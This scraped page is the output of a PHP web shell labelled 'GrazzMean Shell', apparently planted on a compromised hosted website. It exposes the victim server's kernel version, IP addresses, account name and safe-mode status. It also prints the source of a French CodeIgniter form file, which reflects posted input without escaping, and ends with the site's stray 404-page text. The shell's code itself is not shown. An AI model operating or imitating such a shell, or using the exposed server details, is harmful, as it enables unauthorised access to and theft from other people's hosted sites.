shell bypass 403

GrazzMean Shell

Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : add.php
<?php $user = $this->session->userdata("auth"); ?>
<div class="row">
    <div class="col-md-12">
      	<div class="box box-info">
            <div class="box-header with-border">
              	<h3 class="box-title">Ajouter Demande papier</h3>
            </div>
            <?php echo form_open('demanderh/add'); ?>
          	<div class="box-body">
          		<div class="row clearfix">
					<div class="col-md-6">
						<label for="users_id" class="control-label">Utilisateur</label>
						<div class="form-group">
						<input type="text" name="users_id" disabled value="<?php echo $user["name"]." ".$user["prenom"]; ?>" class="form-control" id="users_id" />
						</div>
					</div>
					<div class="col-md-6">
						<label for="papier_id" class="control-label"><span class="text-danger">*</span>Papier</label>
						<div class="form-group">
							<select name="papier_id" class="form-control">
								<option value="">select papier</option>
								<?php 
								foreach($all_papier as $papier)
								{
									$selected = ($papier['id'] == $this->input->post('papier_id')) ? ' selected="selected"' : "";

									echo '<option value="'.$papier['id'].'" '.$selected.'>'.$papier['libelle'].'</option>';
								} 
								?>
							</select>
							<span class="text-danger"><?php echo form_error('papier_id');?></span>
						</div>
					</div>
					<div class="col-md-6">
						<label for="motif" class="control-label">Motif de la demande</label>
						<div class="form-group">
							<textarea name="motif" class="form-control" id="motif"><?php echo $this->input->post('motif'); ?></textarea>
						</div>
					</div>
				</div>
			</div>
          	<div class="box-footer">
            	<button type="submit" class="btn btn-success">
            		<i class="fa fa-check"></i> Envoyer
            	</button>
          	</div>
            <?php echo form_close(); ?>
      	</div>
    </div>
</div>
© 2026 GrazzMean
Page non trouvée – APK Comptoir Hammami
Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.

404 :(

Oups ! Cette page est introuvable.

Il semble que nous ne puissions pas trouver ce que vous cherchez. Peut-être qu'une recherche pourrait vous aider.

Bouton retour en haut de la page